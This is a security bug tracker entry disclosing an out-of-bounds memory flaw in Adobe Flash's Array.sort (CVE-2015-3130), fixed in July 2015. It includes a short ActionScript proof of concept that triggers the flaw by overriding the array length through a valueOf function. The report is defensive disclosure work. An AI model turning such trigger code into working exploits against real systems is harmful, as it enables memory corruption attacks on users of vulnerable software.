New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users
Status: Fixed
Owner:
Email to this user bounced
Closed: Jul 2015
Cc:



Sign in to add a comment
Adobe Flash: Array.sort can go out of bounds
Project Member Reported by natashenka@google.com, May 7 2015 Back to list
If the length of an array is overridden so that it returns a long length, and then later a short one, Array.sort can swap array elements that are out of bounds of the array in memory.

A PoC is as follows:

var s = 1;

var rec_array:Array = new Array();
rec_array.push({name: "john", city: "omaha", zip: 68144});
rec_array.push({name: "john", city: "kansas city", zip: 72345});
rec_array.push({name: "bob", city: "omaha", zip: 94010});

var n = {valueOf : gl};
rec_array.length = n;

rec_array.sortOn(["name", "city"]);
for(i=0; i<rec_array.length; i++){
    trace(rec_array[i].name + ", " + rec_array[i].city);
}

function gl(){
	
	trace(s);
		if(s< 3){
		s++;
		return 100000;
	}else{
		return 3;		
		}
	}

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
arraysort.swf
826 bytes Download
arraysort.fla
4.8 KB Download
Project Member Comment 1 by natashenka@google.com, May 8 2015
This is PSIRT-3659
Comment 2 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-3130
Comment 3 by cevans@google.com, Jul 9 2015
Labels: Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
Project Member Comment 4 by natashenka@google.com, Aug 3 2015
Labels: -Restrict-View-Commit
Sign in to add a comment